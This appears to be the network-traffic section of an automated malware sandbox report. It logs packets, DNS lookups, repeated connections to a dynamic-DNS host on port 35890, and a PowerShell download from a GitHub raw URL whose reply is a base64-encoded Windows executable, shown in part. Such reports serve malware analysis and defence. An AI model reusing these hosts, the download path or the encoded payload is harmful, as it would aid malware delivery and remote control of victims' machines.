                                                                                                  Oct 7, 2024 14:52:27.607181072 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.607368946 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.607398987 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.607419968 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.607419968 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.607426882 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.607444048 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.607841969 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.660979986 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661005974 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661067963 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.661079884 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661200047 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.661360025 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661375046 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661423922 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.661439896 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661827087 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.661847115 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.662513018 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.662513018 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.662513018 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.662523031 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.662945032 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.692042112 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692066908 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692377090 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692418098 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692606926 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.692606926 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.692606926 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.692625999 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692801952 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692816019 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.692951918 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.692961931 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.693382978 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.693402052 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.694535017 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.694545984 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.734972000 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.764055967 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.764082909 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.764389038 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.764427900 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.764481068 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.764482021 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.764482021 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.764497042 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.764741898 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.764755964 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.765011072 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.765028954 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.765260935 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.765260935 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.765260935 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.765275955 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.765954018 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.778697014 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.778717041 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.779135942 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.779162884 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.779197931 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.779197931 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.779197931 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.779218912 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.779400110 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.779589891 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.779603958 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.780056953 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.780070066 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.783119917 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.783148050 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.783442020 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.783442020 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.783449888 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.821847916 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.821871996 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.821917057 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.821924925 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.822310925 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.834508896 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834542036 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834631920 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.834631920 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.834641933 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834789038 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834829092 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834862947 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834903955 CEST44349761188.114.97.3192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.834944963 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.834944963 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.834944963 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.835218906 CEST49761443192.168.2.5188.114.97.3
                                                                                                  Oct 7, 2024 14:52:27.956279993 CEST4977235890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:27.961301088 CEST358904977264.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.961375952 CEST4977235890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:27.967586994 CEST4977235890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:27.972491980 CEST358904977264.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:52:49.343555927 CEST358904977264.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:52:49.343622923 CEST4977235890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:49.343677998 CEST4977235890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:49.348498106 CEST358904977264.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:52:50.345336914 CEST4992035890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:50.350158930 CEST358904992064.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:52:50.350265980 CEST4992035890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:50.353940964 CEST4992035890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:52:50.358792067 CEST358904992064.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:11.706828117 CEST358904992064.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:11.706899881 CEST4992035890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:11.706963062 CEST4992035890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:11.713576078 CEST358904992064.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:12.720715046 CEST4999935890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:12.725716114 CEST358904999964.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:12.725815058 CEST4999935890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:12.729294062 CEST4999935890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:12.734337091 CEST358904999964.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:34.062994003 CEST358904999964.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:34.063069105 CEST4999935890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:34.063138962 CEST4999935890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:34.067986012 CEST358904999964.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:35.092125893 CEST5000135890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:35.097198963 CEST358905000164.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:35.097290993 CEST5000135890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:35.100888014 CEST5000135890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:35.105926037 CEST358905000164.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:56.471625090 CEST358905000164.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:56.471791029 CEST5000135890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:56.471829891 CEST5000135890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:56.476840019 CEST358905000164.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:57.485641003 CEST5000335890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:57.490694046 CEST358905000364.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:53:57.490852118 CEST5000335890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:57.494420052 CEST5000335890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:53:57.499497890 CEST358905000364.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:54:18.849277020 CEST358905000364.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:54:18.849461079 CEST5000335890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:54:18.849461079 CEST5000335890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:54:18.854407072 CEST358905000364.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:54:19.860723019 CEST5000535890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:54:19.865688086 CEST358905000564.188.16.157192.168.2.5
                                                                                                  Oct 7, 2024 14:54:19.865789890 CEST5000535890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:54:19.869249105 CEST5000535890192.168.2.564.188.16.157
                                                                                                  Oct 7, 2024 14:54:19.874378920 CEST358905000564.188.16.157192.168.2.5
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 7, 2024 14:52:23.453064919 CEST6098553192.168.2.51.1.1.1
                                                                                                  Oct 7, 2024 14:52:23.460340977 CEST53609851.1.1.1192.168.2.5
                                                                                                  Oct 7, 2024 14:52:26.314512968 CEST5629653192.168.2.51.1.1.1
                                                                                                  Oct 7, 2024 14:52:26.322633028 CEST53562961.1.1.1192.168.2.5
                                                                                                  Oct 7, 2024 14:52:27.941997051 CEST6387753192.168.2.51.1.1.1
                                                                                                  Oct 7, 2024 14:52:27.951636076 CEST53638771.1.1.1192.168.2.5
                                                                                                  Oct 7, 2024 14:52:41.282552004 CEST5315653192.168.2.51.1.1.1
                                                                                                  Oct 7, 2024 14:52:41.291714907 CEST53531561.1.1.1192.168.2.5
                                                                                                  Oct 7, 2024 14:53:35.079083920 CEST4927753192.168.2.51.1.1.1
                                                                                                  Oct 7, 2024 14:53:35.089389086 CEST53492771.1.1.1192.168.2.5
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 7, 2024 14:52:23.453064919 CEST192.168.2.51.1.1.10x98e7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:26.314512968 CEST192.168.2.51.1.1.10xd91Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:27.941997051 CEST192.168.2.51.1.1.10x548Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:41.282552004 CEST192.168.2.51.1.1.10x4776Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:53:35.079083920 CEST192.168.2.51.1.1.10xf584Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 7, 2024 14:52:08.043061972 CEST1.1.1.1192.168.2.50xedeaNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:08.043061972 CEST1.1.1.1192.168.2.50xedeaNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:23.460340977 CEST1.1.1.1192.168.2.50x98e7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:23.460340977 CEST1.1.1.1192.168.2.50x98e7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:23.460340977 CEST1.1.1.1192.168.2.50x98e7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:23.460340977 CEST1.1.1.1192.168.2.50x98e7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:26.322633028 CEST1.1.1.1192.168.2.50xd91No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:26.322633028 CEST1.1.1.1192.168.2.50xd91No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:27.951636076 CEST1.1.1.1192.168.2.50x548No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:52:41.291714907 CEST1.1.1.1192.168.2.50x4776No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false
                                                                                                  Oct 7, 2024 14:53:35.089389086 CEST1.1.1.1192.168.2.50xf584No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false
                                                                                                  • raw.githubusercontent.com
                                                                                                  • paste.ee
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549740185.199.108.1334433836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-07 12:52:23 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                  Host: raw.githubusercontent.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-07 12:52:24 UTC903INHTTP/1.1 200 OK
                                                                                                  Connection: close
                                                                                                  Content-Length: 2935468
                                                                                                  Cache-Control: max-age=300
                                                                                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-Frame-Options: deny
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  X-GitHub-Request-Id: C152:36BD6F:195809:1AFA8B:6703D986
                                                                                                  Accept-Ranges: bytes
                                                                                                  Date: Mon, 07 Oct 2024 12:52:24 GMT
                                                                                                  Via: 1.1 varnish
                                                                                                  X-Served-By: cache-ewr-kewr1740051-EWR
                                                                                                  X-Cache: MISS
                                                                                                  X-Cache-Hits: 0
                                                                                                  X-Timer: S1728305544.003632,VS0,VE85
                                                                                                  Vary: Authorization,Accept-Encoding,Origin
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                  X-Fastly-Request-ID: 40aab19bc0bd63b03141eb35e9f204ddbc47cc4b
                                                                                                  Expires: Mon, 07 Oct 2024 12:57:24 GMT
                                                                                                  Source-Age: 0
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                  Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                  Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                  Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                  Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                  Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
